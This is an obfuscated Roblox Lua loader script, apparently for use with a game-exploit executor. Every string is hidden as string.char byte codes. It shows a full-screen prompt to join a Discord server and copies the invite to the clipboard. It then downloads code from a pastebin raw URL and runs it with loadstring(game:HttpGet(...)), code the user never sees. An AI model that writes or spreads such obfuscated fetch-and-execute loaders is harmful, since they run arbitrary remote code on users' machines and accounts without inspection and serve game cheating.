(function() local _G1 = game:GetService(string.char(67, 111, 114, 101, 71, 117, 105)) local _I1, _U2, _C3, _C3R = Instance.new, UDim2.new, Color3.new, Color3.fromRGB local _SG = _I1(string.char(83, 99, 114, 101, 101, 110, 71, 117, 105)) _SG.Name = string.char(76, 111, 97, 100, 101, 114) _SG.Parent = _G1 local _FR = _I1(string.char(70, 114, 97, 109, 101)) _FR.Size = _U2(1, 0, 1, 0) _FR.BackgroundColor3 = _C3(0, 0, 0) _FR.Parent = _SG local _TL1 = _I1(string.char(84, 101, 120, 116, 76, 97, 98, 101, 108)) _TL1.Size = _U2(0, 400, 0, 50) _TL1.Position = _U2(0.5, -200, 0.4, -25) _TL1.BackgroundTransparency = 1 _TL1.TextColor3 = _C3(1, 1, 1) _TL1.TextScaled = true _TL1.Font = Enum.Font.Code _TL1.Text = string.char(99, 111, 112, 121, 32, 97, 110, 100, 32, 106, 111, 105, 110, 32, 100, 105, 115, 99, 111, 114, 100, 32, 102, 111, 114, 32, 109, 111, 114, 101, 33) _TL1.Parent = _FR local _BTN = _I1(string.char(84, 101, 120, 116, 66, 117, 116, 116, 111, 110)) _BTN.Size = _U2(0, 200, 0, 50) _BTN.Position = _U2(0.5, -100, 0.5, 0) _BTN.BackgroundColor3 = _C3R(40, 40, 40) _BTN.TextColor3 = _C3(1, 1, 1) _BTN.TextScaled = true _BTN.Font = Enum.Font.Code _BTN.Text = string.char(67, 111, 112, 121) _BTN.Parent = _FR local _TL2 = _I1(string.char(84, 101, 120, 116, 76, 97, 98, 101, 108)) _TL2.Size = _U2(0, 400, 0, 50) _TL2.Position = _U2(0.5, -200, 0.4, -25) _TL2.BackgroundTransparency = 1 _TL2.TextColor3 = _C3(0, 1, 0) _TL2.TextScaled = true _TL2.Font = Enum.Font.Code _TL2.Text = "" _TL2.Visible = false _TL2.Parent = _FR _BTN.MouseButton1Click:Connect(function() -- Copies Discord link to clipboard setclipboard(string.char(104, 116, 116, 112, 115, 58, 47, 47, 100, 105, 115, 99, 111, 114, 100, 46, 103, 103, 47, 53, 117, 50, 84, 82, 122, 75, 56, 71)) _TL1.Visible, _BTN.Visible = false, false _TL2.Visible = true -- Sets text to "successful\nloading script..." _TL2.Text = string.char(115, 117, 99, 99, 101, 115, 115, 102, 117, 108, 10, 108, 111, 97, 100, 105, 110, 103, 32, 115, 99, 114, 105, 112, 116, 46, 46, 46) task.wait(2) _SG:Destroy() -- Executes your Pastebin loadstring(game:HttpGet(string.char(104, 116, 116, 112, 115, 58, 47, 47, 112, 97, 115, 116, 101, 98, 105, 110, 46, 99, 111, 109, 47, 114, 97, 119, 47, 104, 68, 70, 48, 102, 99, 90, 99)))() end) end)()